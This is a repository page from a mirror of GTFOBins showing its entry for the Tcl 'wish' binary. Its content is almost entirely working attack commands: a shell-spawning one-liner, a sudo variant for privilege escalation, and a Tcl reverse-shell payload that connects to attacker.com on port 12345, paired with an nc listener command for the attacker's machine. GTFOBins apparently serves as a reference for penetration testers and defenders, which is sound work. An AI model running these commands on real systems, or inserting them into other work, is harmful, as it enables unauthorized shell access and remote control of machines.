This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-10-24 22:35:47 +02:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
c41d58de2adbb6c719af49dd6a1afb4a89b48520
GTFOBins.github.io
/
_gtfobins
/
wish.md
Andrea Cardaci
36dcf7a836
Reorganize function names
2018-05-25 15:30:02 +02:00
612 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
reverse-shell-non-interactive
code
wish exec /bin/sh <@stdin >@stdout 2>@stderr
code
sudo wish exec /bin/sh <@stdin >@stdout 2>@stderr
description
code
Run `nc -l -p 12345` on the attacker box to receive the shell.
export RHOST=attacker.com export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish